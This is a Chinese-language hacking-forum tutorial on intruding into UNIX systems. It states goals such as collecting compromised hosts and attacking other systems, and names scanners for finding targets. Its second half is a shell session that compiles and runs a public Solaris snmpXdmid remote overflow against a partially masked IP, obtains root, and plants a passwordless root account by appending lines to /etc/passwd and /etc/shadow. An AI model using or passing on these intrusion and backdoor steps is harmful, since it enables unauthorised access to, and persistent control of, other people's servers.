一:基本知识
1:常见UNIX版本:
SCOUNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD,386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN),InTeractive,Mach,Minix,MksToolkit,NetNSD,O游戏/I,SystemVUnix,Unicos,Unixware...
2:简单介绍几个
sunos&solarisSUN本来想用solaris取代sunos,不过在用户的要求下,到目前为止,还是维持两者并存的政策;
Freebsd是著名的BSD-UNIX的一的继承者,是UNIX众多分支中相当稳定的一个,很多ISP均使用运行Freebsd;
Linux是一个面对PC机个人用户的自由廉价的UNIX产品(其硬件平台是Intel系列的CPU),实际上众多的网络管理员真正使用的是Linux。
3:UNIX操作系统的特点
(1)多用户和多任务;(2)可移植性;(3)树行结构的文件系统;(4)I/O重定向技术和管道技术;(5)丰富的实用程序;(6)每个用户都有电子邮件。
4:尤为突出的优点
(1)稳定可靠性高;(2)网络功能强;(3)开发性好;(4)强大的数据库支持功能;(5)伸缩性强。
二:入侵目的
1:学习UNIX,熟悉内部操作,整体配置...
2:做跳板或以此捕捉更多UNIX肉鸡;
3:越权得到某些正常请求下得不到的东西;
4:攻击破坏或以此作为利器来破坏其他系统;
5:更多......
三:入侵方法
1:寻找目标
工具:supperscan,流光,LANguardNetworkScanner2.0或者其他,凭个人喜好选用
supperscan:扫描23,79端口,注意含%,#,&...主机,这些就是UNIX;
LANguard..作简单设置,即可开始,判断对方操作系统功能乃同类软件中的精品,直观准确;
流光:利用高级扫描,选telnet,PRC,POP3,FTP,Finger即可。
其他方法一样...
(说明:很多管理员为了迷惑入侵者往往故意更改telnet登陆时出现的信息,请注意识别)
2:开始入侵
(1)溢出(所有关于UNIX的溢出,都需要在一个UNIX/Linux的环境下进行编译)
A:远程溢出
溢出?呵呵,太多了!随便说几个:freebsd远程溢出,bind远程溢出,SunSolaris5.7/5.8Sparc远程溢出,redhat6.xrpcstatus远程溢出...自己去一一了解吧,在这里我简单说两个例子:
a1:考虑到很多朋友使用windows,所以大家可以参看我的兄弟---蓝骑士的大作《freebsd溢出完全图文版》(地址:http://www.itser.com/ez/.bbs/top...;topic=25&show=),因为这个溢出程序有已经编译好了可以直接在windows下使用;
a2unSolaris5.7Sparc远程溢出
搜索...终于让我找到了一台sunos5.7,上我一台sunos5.8
telnet66.*.146.48----->>这是我的!
SunOS5.8
login:ply
Password:
Lastlogin:TueApr2303:55:09from39448.ddn.xaonli
SunMicrosystemsInc.SunOS5.8GenericFebruary2000
$tmp/.sh----->>当时溢出时做的处理!
#ls
bindataetcinitrdmntprocsbinusr
bootdevhomelibmiscoptroottmpvar
xfnskip
#cat>snmp.c
.......----->>太长了,省略...自己去找!
#gcc-osnmpsnmp.c----->>用gcc编译
snmp.c:Infunction****main':
snmp.c:181:warning:passingarg3ofpointertofunctionfromincompatiblepointertype
snmp.c:181:warning:passingarg4ofpointertofunctionfromincompatiblepointertype
snmp.c:181:warning:passingarg5ofpointertofunctionfromincompatiblepointertype
#ls
bindataetcinitrdmntprocsbinsnmpusr
bootdevhomelibmiscoptrootsnmp.ctmpvar
#./snmp
copyrightLASTSTAGEOFDELIRIUMmar2001poland//lsd-pl.net/
snmpXdmidforsolaris2.72.8sparc
usage:./saddress[-pport]-v7|8
#./snmp216.*.45.63-v7---->开始溢出!!
DELIRIUMmar2001poland//lsd-pl.net/
snmpXdmidforsolaris2.72.8sparc
adr=0x000c8f68timeout=30port=928connected!
sent!
SunOSapp1-stg-bk-sh5.7Generic_106541-09sun4usparcSUNW,Ultra-80
id
uid=0(root)gid=0(root)----->>是root哦!
echo"ply::0:0::/:/bin/bash">>/etc/passwd----->>加个用户先!
echo"ply::::::::">>/etc/shadow
...----->>还想干什么就继续吧!
*
* |
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡